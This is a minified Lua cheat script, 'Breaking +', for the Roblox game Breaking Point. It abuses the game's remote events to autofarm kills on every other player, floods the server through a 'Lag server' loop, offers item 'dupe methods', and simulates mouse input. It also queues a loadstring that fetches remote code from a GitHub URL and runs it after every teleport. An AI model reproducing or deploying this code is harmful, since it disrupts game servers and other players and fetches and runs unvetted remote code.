v42.Autosave.ImageButton.fill.Visible=false;v42.Autosave.ImageButton.fill.ImageTransparency=0;Feature3UnFunction();elseif (ReturnData("Feature3.txt")=="true") then v42.Autosave.ImageButton.fill.Visible=true;v42.Autosave.ImageButton.fill.ImageTransparency=0;Feature3Function();else v42.Autosave.ImageButton.fill.Visible=false;v42.Autosave.ImageButton.fill.ImageTransparency=0;Feature3UnFunction();DefaultData("Feature3.txt","false");end end);function FeatureFunction() ChangeData("Feature1.txt","true");HideBlood=false;game:GetService("CoreGui"):WaitForChild("TopBarApp",15):FindFirstChild("FullScreenFrame").Visible=false;Debug("Started hiding blood");end function FeatureUnFunction() ChangeData("Feature1.txt","false");HideBlood=true;Debug("Stopped hiding blood");end v37(v40,FeatureFunction,FeatureUnFunction);pcall(function() if (ReturnData("Feature1.txt")=="false") then v40.Autosave.ImageButton.fill.Visible=false;v40.Autosave.ImageButton.fill.ImageTransparency=0;FeatureUnFunction();elseif (ReturnData("Feature1.txt")=="true") then v40.Autosave.ImageButton.fill.Visible=true;v40.Autosave.ImageButton.fill.ImageTransparency=0;FeatureFunction();else v40.Autosave.ImageButton.fill.Visible=false;v40.Autosave.ImageButton.fill.ImageTransparency=0;FeatureUnFunction();DefaultData("Feature1.txt","false");end end);function Feature2Function() ChangeData("Feature2.txt","true");v73=true;v76:Fire();local v221=Instance.new("Model",game.CoreGui);v221.Name="ImproveUI";v5.setting.ImageLabel.ImageColor3=Color3.fromRGB(15,15,15);v5.server1.ImageLabel.ImageColor3=Color3.fromRGB(15,15,15);v5.profile.ImageLabel.ImageColor3=Color3.fromRGB(20,20,20);v5.rank.ImageLabel.ImageColor3=Color3.fromRGB(20,20,20);local v227=Instance.new("UICorner");v227.CornerRadius=UDim.new(0,10);local v229=Instance.new("UICorner");v229.CornerRadius=UDim.new(0,5);v227:Clone().Parent=v5.decision;v229:Clone().Parent=v5.decision.public;v229:Clone().Parent=v5.decision.secret;v5.decision.secret.BackgroundColor3=Color3.fromRGB(5,5,5);task.spawn(function() v5.shop.sectionframes.ChildAdded:Wait();if (ReturnData("Feature2.txt")=="true") then local v505=false;local v506=nil;for v550,v551 in pairs(v5.shop.sectionbuttons:GetChildren()) do if (v551:FindFirstChild("TextLabel") and (v551:FindFirstChild("TextLabel").Text=="Other")) then v506=v551:FindFirstChild("ImageButton");v505=true;end end if (v505==true) then v506.Image="rbxassetid://17375911551";end end end);local v237=false;local v238=nil;for v300,v301 in pairs(v5.shop.sectionbuttons:GetChildren()) do if (v301:FindFirstChild("TextLabel") and (v301:FindFirstChild("TextLabel").Text=="Other")) then v238=v301:FindFirstChild("ImageButton");v237=true;end end if (v237==true) then v238.Image="rbxassetid://17375911551";end Debug("Added improvements to the UI");end function Feature2UnFunction() ChangeData("Feature2.txt","false");v73=false;v76:Fire();if game.CoreGui:FindFirstChild("ImproveUI") then v5.decision.secret.BackgroundColor3=Color3.fromRGB(27,27,27);v5.server1.ImageLabel.ImageColor3=Color3.fromRGB(30,30,30);v5.setting.ImageLabel.ImageColor3=Color3.fromRGB(30,30,30);v5.profile.ImageLabel.ImageColor3=Color3.fromRGB(30,30,30);v5.rank.ImageLabel.ImageColor3=Color3.fromRGB(30,30,30);v5.decision.secret:FindFirstChild("UICorner"):Destroy();v5.decision.public:FindFirstChild("UICorner"):Destroy();v5.decision:FindFirstChild("UICorner"):Destroy();game.CoreGui:FindFirstChild("ImproveUI"):Destroy();if v5.setting:FindFirstChild("BlurFrame") then v5.setting:FindFirstChild("BlurFrame").Visible=false;task.wait();v5.setting:FindFirstChild("BlurFrame"):Destroy();workspace.CurrentCamera:ClearAllChildren();for v592,v593 in game.Lighting:GetChildren() do if (v593.Name=="DepthOfField") then v593:Destroy();end end end local v417=false;local v418=nil;for v507,v508 in pairs(v5.shop.sectionbuttons:GetChildren()) do if (v508:FindFirstChild("TextLabel") and (v508:FindFirstChild("TextLabel").Text=="Other")) then v418=v508:FindFirstChild("ImageButton");v417=true;end end if (v417==true) then v418.Image="rbxassetid://0";end else end Debug("Removed the improvements to the UI");end if (ReturnData("Feature2.txt")=="false") then v41.Autosave.ImageButton.fill.Visible=false;v41.Autosave.ImageButton.fill.ImageTransparency=0;Feature2UnFunction();elseif (ReturnData("Feature2.txt")=="true") then v41.Autosave.ImageButton.fill.Visible=true;v41.Autosave.ImageButton.fill.ImageTransparency=0;Feature2Function();else v41.Autosave.ImageButton.fill.Visible=false;v41.Autosave.ImageButton.fill.ImageTransparency=0;Feature2UnFunction();DefaultData("Feature2.txt","false");end v37(v41,Feature2Function,Feature2UnFunction);v38.CanvasSize=UDim2.new(0,0,0,830);v5.buttons.shop.ImageButton.Position=UDim2.new(1.025,0,0,35);v5.buttons.shop.ImageButton.Visible=true;v5.version.Text=v5.version.Text   .. " | V"   .. tostring(v0) ;v5.version.Size=UDim2.new(0,100,0,25);local v83=v5.mockinv.top.everydivine:Clone();v83.Parent=v7.top;v83.Visible=true;v83.ImageColor3=Color3.fromRGB(0,255,196);v83.ImageTransparency=0.45;v7.top.TextButton.ZIndex=2;v14.Parent=v7.top;v14.ZIndex=2;local v92=v5.buttons.inv:Clone();v92.Parent=v7;v92.Name="rejoin";v92.Position=UDim2.new(0.375,0,0.75,35);v92.ImageColor3=Color3.fromRGB(47,121,255);v92.TextLabel.Text="Rejoin";v92.MouseButton1Click:Connect(function() rejoin(true);end);v92.MouseEnter:Connect(function() game:GetService("TweenService"):Create(v92,TweenInfo.new(0.25),{ImageTransparency=0}):Play();end);v92.MouseLeave:Connect(function() game:GetService("TweenService"):Create(v92,TweenInfo.new(0.25),{ImageTransparency=0.5}):Play();end);local v98=v5.buttons.inv:Clone();v98.Parent=v7;v98.Name="respawn";v98.Position=UDim2.new(0.65,0,0.625,35);v98.ImageColor3=Color3.fromRGB(255,255,255);v98.TextLabel.Text="Respawn";v98.MouseButton1Click:Connect(function() respawn(false);end);v98.MouseEnter:Connect(function() game:GetService("TweenService"):Create(v98,TweenInfo.new(0.25),{ImageTransparency=0}):Play();end);v98.MouseLeave:Connect(function() game:GetService("TweenService"):Create(v98,TweenInfo.new(0.25),{ImageTransparency=0.5}):Play();end);local v104=v5.buttons.inv:Clone();v104.Parent=v7;v104.Name="refresh";v104.Position=UDim2.new(0.65,0,0.5,35);v104.ImageColor3=Color3.fromRGB(255,255,255);v104.TextLabel.Text="Refresh";v104.MouseButton1Click:Connect(function() if (game.Players.LocalPlayer.Character and game.Players.LocalPlayer.Character:FindFirstChild("HumanoidRootPart")) then local v419=game.Players.LocalPlayer.Character:FindFirstChild("HumanoidRootPart").CFrame;local v420=workspace.CurrentCamera.CFrame;respawn(false);v4.CharacterAdded:Once(function(v513) task.wait();game.Players.LocalPlayer.Character:FindFirstChild("HumanoidRootPart").CFrame=v419;wait();workspace.CurrentCamera.CFrame=v420;end);elseif (game.Players.LocalPlayer.Character and game.Players.LocalPlayer.Character:FindFirstChild("Torso")) then local v554=game.Players.LocalPlayer.Character:FindFirstChild("Torso").CFrame;local v555=workspace.CurrentCamera.CFrame;respawn(false);v4.CharacterAdded:Once(function(v594) task.wait();game.Players.LocalPlayer.Character:FindFirstChild("Torso").CFrame=v554;wait();workspace.CurrentCamera.CFrame=v555;end);else Notify("Could not refresh | Did not find torso/root. (Suggest to respawn)");end end);v104.MouseEnter:Connect(function() game:GetService("TweenService"):Create(v104,TweenInfo.new(0.25),{ImageTransparency=0}):Play();end);v104.MouseLeave:Connect(function() game:GetService("TweenService"):Create(v104,TweenInfo.new(0.25),{ImageTransparency=0.5}):Play();end);local v110=v5.buttons.inv:Clone();v110.Parent=v7;v110.Name="serverhop";v110.Position=UDim2.new(0.65,0,0.75,35);v110.ImageColor3=Color3.fromRGB(166,255,137);v110.TextLabel.Text="Server hop";v110.MouseButton1Click:Connect(function() serverhop(true);end);v110.MouseEnter:Connect(function() game:GetService("TweenService"):Create(v110,TweenInfo.new(0.25),{ImageTransparency=0}):Play();end);v110.MouseLeave:Connect(function() game:GetService("TweenService"):Create(v110,TweenInfo.new(0.25),{ImageTransparency=0.5}):Play();end);local v116=v5.buttons.inv:Clone();v116.Parent=v7;v116.Name="lag";v116.Position=UDim2.new(0.095,0,0.75,35);v116.ImageColor3=Color3.fromRGB(155,0,0);v116.TextLabel.Text="Lag server";local v122=false;task.spawn(function() while true do task.wait();if (v122==true) then lag(4,false);end end end);v116.MouseButton1Click:Connect(function() if (v122==false) then v116.TextLabel.Text="Stop lagging";v122=true;else v116.TextLabel.Text="Lag server";v122=false;end end);v116.MouseEnter:Connect(function() game:GetService("TweenService"):Create(v116,TweenInfo.new(0.25),{ImageTransparency=0}):Play();end);v116.MouseLeave:Connect(function() game:GetService("TweenService"):Create(v116,TweenInfo.new(0.25),{ImageTransparency=0.5}):Play();end);task.spawn(function() task.wait(0.25);v14.Text=v8.Text;v8.Changed:Connect(function() v14.Text=v8.Text;v20=tonumber(v8.Text:sub( -v8.Text:len(), -8));end);end);local v123=v5.buttons.inv:Clone();v123.Parent=v7;v123.Name="autofarm";v123.Position=UDim2.new(0.375,0,0.625,35);v123.ImageColor3=Color3.fromRGB(255,60,0);v123.TextLabel.Text="Disable autofarm";v123.TextLabel.TextSize=11;v123.MouseButton1Click:Connect(function() if (v28==true) then v28=false;v123.ImageColor3=Color3.fromRGB(0,225,225);v123.TextLabel.Text="Enable autofarm";respawn(false);else v28=true;v123.ImageColor3=Color3.fromRGB(255,60,0);v123.TextLabel.Text="Disable autofarm";end end);v123.MouseEnter:Connect(function() game:GetService("TweenService"):Create(v123,TweenInfo.new(0.25),{ImageTransparency=0}):Play();end);v123.MouseLeave:Connect(function() game:GetService("TweenService"):Create(v123,TweenInfo.new(0.25),{ImageTransparency=0.5}):Play();end);v7.Name="Breaking+";v7.top.TextLabel:FindFirstChildOfClass("ImageLabel"):Destroy();v7.top.TextLabel.Text="Breaking +";v7.top.TextLabel.ZIndex=2;v6.ImageColor3=Color3.fromRGB(0,200,125);v6.Position=UDim2.new(0, -200,0,140);v6.TextLabel.Text="Breaking +";v6.Name="Breaking+";v6.Visible=true;game:GetService("TweenService"):Create(v6,TweenInfo.new(0.5),{Position=UDim2.new(0,0,0,140)}):Play();local function v138() task.wait(1.25);task.spawn(function() local v306=v21:Clone();v5.inv.sectionframes:GetChildren()[3].TextLabel.Visible=false;v306.Image="https://www.roblox.com/Thumbs/Asset.ashx?width=100&height=100&assetId=3422633744";v306.name.Text="Stellar";v306.type.Text="Legendary";v306.type.TextColor3=Color3.fromRGB(255,79,82);v306.Parent=v5.inv.sectionframes:GetChildren()[3];v306.MouseButton1Down:Connect(function() if (v306.BorderSizePixel==0) then v306.BorderSizePixel=2;game:GetService("ReplicatedStorage").RemoteEvent:FireServer(55,"Chair Skins","Space","Stellar");for v597,v598 in pairs(v5.inv.sectionframes:GetChildren()[3].GridOrder:GetChildren()) do if ((v598~=v306) and v598:IsA("ImageButton")) then v598.BorderSizePixel=0;end end else v306.BorderSizePixel=0;end end);end);task.spawn(function() local v314=v22:Clone();v314.Image="https://www.roblox.com/Thumbs/Asset.ashx?width=100&height=100&assetId=1077205771";v314.name.Text="Blue Galaxy";v314.type.Text="Legendary";v314.type.TextColor3=Color3.fromRGB(255,79,82);v314.Parent=v5.inv.sectionframes:GetChildren()[3];v314.MouseButton1Down:Connect(function() if (v314.BorderSizePixel==0) then v314.BorderSizePixel=2;game:GetService("ReplicatedStorage").RemoteEvent:FireServer(55,"Chair Skins","Space","Blue Galaxy");for v599,v600 in pairs(v5.inv.sectionframes:GetChildren()[3].GridOrder:GetChildren()) do if ((v600~=v314) and v600:IsA("ImageButton")) then v600.BorderSizePixel=0;end end else v314.BorderSizePixel=0;end end);end);end task.spawn(function() while task.wait(0.75) do if  not v5.inv.sectionframes:GetChildren()[2]:FindFirstChild("GridOrder") then task.wait(0.35);task.spawn(function() v138();end);for v560,v561 in pairs(v5.inv.sectionframes:GetChildren()) do local v562=Instance.new("Frame");local v563=Instance.new("UIGridLayout");local v564=Instance.new("UIPadding");local v565={Divine= -5,Legendary= -4,Rare= -3,Uncommon= -2,Common= -1};v562.Parent=v561;v562.BackgroundTransparency=1;v562.Size=UDim2.new(1,0,1,0);v562.Name="GridOrder";v564.Parent=v562;v564.PaddingTop=UDim.new(0,5);v564.PaddingLeft=UDim.new(0,20);v563.CellPadding=UDim2.new(0,18,0,10);v563.Parent=v562;v563.SortOrder=Enum.SortOrder.LayoutOrder;for v601,v602 in pairs(v561:GetChildren()) do if v602:IsA("ImageButton") then v602.LayoutOrder=v565[tostring(v602.type.Text)];v602.Parent=v562;v602.MouseButton1Down:Connect(function() for v691,v692 in pairs(v562:GetChildren()) do if ((v692~=v602) and v692:IsA("ImageButton")) then v692.BorderSizePixel=0;end end end);end end v561.CanvasSize=UDim2.new(0,0,0,v563.AbsoluteContentSize.Y + 10 );v561.ChildAdded:Connect(function(v603) task.wait();if v603:IsA("ImageButton") then v603.LayoutOrder=v565[tostring(v603.type.Text)];v603.Parent=v562;v603.MouseButton1Down:Connect(function() for v693,v694 in pairs(v562:GetChildren()) do if ((v694~=v603) and v694:IsA("ImageButton")) then v694.BorderSizePixel=0;end end end);end v561.CanvasSize=UDim2.new(0,0,0,v563.AbsoluteContentSize.Y + 10 );end);end end end end);function PlayerExecute(v241) task.wait();if (v241~=v4) then v11.Size=UDim2.new(0,130,0,120);local v428=v11:FindFirstChild("button"):Clone();v428.Position=UDim2.new(2,0,0,81);v428.Parent=v11;v428.TextLabel.Text="Trade";v428.ImageColor3=Color3.fromRGB(14,35,14);v428.button.ImageColor3=Color3.fromRGB(85,170,0);local v434;v434=v11:FindFirstChild("button").Changed:Connect(function() if (v11:FindFirstChild("button").Position.X.Scale~=0) then v428.Position=UDim2.new(v11:FindFirstChild("button").Position.X.Scale,0,0,81);else v434:Disconnect();end end);v428.MouseEnter:Connect(function() game:GetService("TweenService"):Create(v428.button,TweenInfo.new(0.1,Enum.EasingStyle.Linear),{ImageTransparency=0.8}):Play();end);v428.MouseLeave:Connect(function() game:GetService("TweenService"):Create(v428.button,TweenInfo.new(0.1,Enum.EasingStyle.Linear),{ImageTransparency=1}):Play();end);v428.MouseButton1Click:Connect(function() v11.Visible=false;game:GetService("ReplicatedStorage").RemoteFunction:InvokeServer(73,v241);end);else v11.Size=UDim2.new(0,130,0,60);local v436=v11:FindFirstChild("button"):Clone();v436.Position=UDim2.new(2,0,0,27);v436.Parent=v11;v436.TextLabel.Text="Headless";v436.ImageColor3=Color3.fromRGB(38,11,11);v436.button.ImageColor3=Color3.fromRGB(125,15,15);local v442;v442=v11:FindFirstChild("button").Changed:Connect(function() if (v11:FindFirstChild("button").Position.X.Scale~=0) then v436.Position=UDim2.new(v11:FindFirstChild("button").Position.X.Scale,0,0,27);else v442:Disconnect();end end);v436.MouseEnter:Connect(function() game:GetService("TweenService"):Create(v436.button,TweenInfo.new(0.1,Enum.EasingStyle.Linear),{ImageTransparency=0.8}):Play();end);v436.MouseLeave:Connect(function() game:GetService("TweenService"):Create(v436.button,TweenInfo.new(0.1,Enum.EasingStyle.Linear),{ImageTransparency=1}):Play();end);v436.MouseButton1Click:Connect(function() v11.Visible=false;v4.Character.Torso.Neck.C1=CFrame.new(0,0,100);game:GetService("ReplicatedStorage").RemoteEvent:FireServer("neck",CFrame.new(0,100,0) * CFrame.Angles( -1.6130179166793823,0,3) );end);end end for v242,v243 in pairs(v12:GetChildren()) do if (v243:IsA("Frame") and v243:FindFirstChild("name") and v243.name:FindFirstChild("TextButton")) then v243.name:FindFirstChild("TextButton").MouseButton1Click:Connect(function() v10=game.Players:FindFirstChild(v243.name:FindFirstChild("TextLabel").Text);PlayerExecute(v10);end);end end v12.ChildAdded:Connect(function(v244) if (v244:IsA("Frame") and v244:FindFirstChild("name") and v244.name:FindFirstChild("TextButton")) then v244.name:FindFirstChild("TextButton").MouseButton1Click:Connect(function() v10=game.Players:FindFirstChild(v244.name:FindFirstChild("TextLabel").Text);PlayerExecute(v10);end);end end);task.spawn(function() for v321,v322 in pairs(v5.trade.Frame.ScrollingFrame:GetChildren()) do repeat task.wait();until game.Players:FindFirstChild(v322.Name):FindFirstChild("tradebanned") or task.wait(3)  if (game.Players:FindFirstChild(v322.Name) and (game.Players:FindFirstChild(v322.Name):FindFirstChild("tradebanned").Value==true)) then v322.grad.ImageColor3=Color3.fromRGB(255,195,195);v322.TextLabel.TextColor3=Color3.fromRGB(133,47,47);v322.ImageLabel.ImageColor3=Color3.fromRGB(35,27,27);end end end);v5.trade.Frame.ScrollingFrame.ChildAdded:Connect(function(v245) repeat task.wait();until game.Players:FindFirstChild(v245.Name):FindFirstChild("tradebanned") or task.wait(3)  if (game.Players:FindFirstChild(v245.Name) and (game.Players:FindFirstChild(v245.Name):FindFirstChild("tradebanned").Value==true)) then v245.grad.ImageColor3=Color3.fromRGB(255,195,195);v245.TextLabel.TextColor3=Color3.fromRGB(133,47,47);v245.ImageLabel.ImageColor3=Color3.fromRGB(35,27,27);end end);v7.top.TextButton.MouseButton1Click:Connect(function() v7.Visible= not v7.Visible;end);v6.MouseButton1Click:Connect(function() if ((v7.Visible==false) and (v15==nil) and (v16==nil) and (v17==nil) and (v18==nil)) then local function v446() task.spawn(function() local v578=v5.buttons.shop.AbsolutePosition.X + 2 ;local v579=v5.buttons.shop.AbsolutePosition.Y + 50 ;local v580=v6.AbsolutePosition.X + 2 ;local v581=v6.AbsolutePosition.Y + 50 ;local v582=game:GetService("VirtualInputManager");v582:SendMouseButtonEvent(v578,v579,0,true,workspace,1);v582:SendMouseButtonEvent(v578,v579,0,false,workspace,1);task.wait(2.9);v582:SendMouseButtonEvent(v580,v581,0,true,workspace,1);v582:SendMouseButtonEvent(v580,v581,0,false,workspace,1);end);return {"Load","Fixing",3};end NotifyButtons("Couldn't load dupe methods. Would you like to fix this automaticly?","Fix","Cancel",v446,function() return {};end);end v7.Visible= not v7.Visible;for v323,v324 in pairs(v5:GetChildren()) do task.spawn(function() if ((v324.Name=="setting") or (v324.Name=="trade") or (v324.Name=="shop") or (v324.Name=="inv") or (v324.Name=="tradelog")) then v324.Visible=false;end end);end end);v1=648362523;local v139=(syn and syn.queue_on_teleport) or queue_on_teleport ;if (v139~=nil) then v139("loadstring(game:HttpGet('https://raw.githubusercontent.com/NaikoScript/Breaking-Plus/main/Script'))()");else Notify("Your exploit does not support teleport execution");end task.spawn(function() while task.wait(1) do if (( #game.Players:GetPlayers()<8) and (v28==true) and (v75==true)) then game.StarterGui:SetCore("SendNotification",{Title="Notification",Text="Server hopping automaticly"});if (TeleportProc==nil) then TeleportProc=true;serverhop(true);wait(15);end end end end);if (game.PlaceId==v1) then repeat wait();until game:IsLoaded() game.StarterGui:SetCore("SendNotification",{Title="Notification",Text="Breaking + | V"   .. tostring(v0)   .. " | loaded successfully." ,Icon="rbxassetid://10698497706"});while true do if (v28==true) then task.wait();if (v74==true) then pcall(function() game:GetService("ReplicatedStorage").RemoteEvent:FireServer(16,"public");end);spawn(function() for v689,v690 in pairs(game.Players:GetPlayers()) do if (v690.Name==game.Players.LocalPlayer.Name) then else pcall(function() game:GetService("ReplicatedStorage").RemoteEvent:FireServer(30,v690);end);end end end);elseif ((v2=="Breaking Point") or (v2=="Who Did It")) then pcall(function() game:GetService("ReplicatedStorage").RemoteEvent:FireServer(16,"public");end);spawn(function() for v695,v696 in pairs(game.Players:GetPlayers()) do if (v696.Name==game.Players.LocalPlayer.Name) then else pcall(function() game:GetService("ReplicatedStorage").RemoteEvent:FireServer(30,v696);end);end end end);end else task.wait(0.5);end end else game.StarterGui:SetCore("SendNotification",{Title="Notification",Text="You need to teleport to the correct mode to autofarm"});task.wait(5);Notify("You need to teleport to the correct mode to autofarm");end
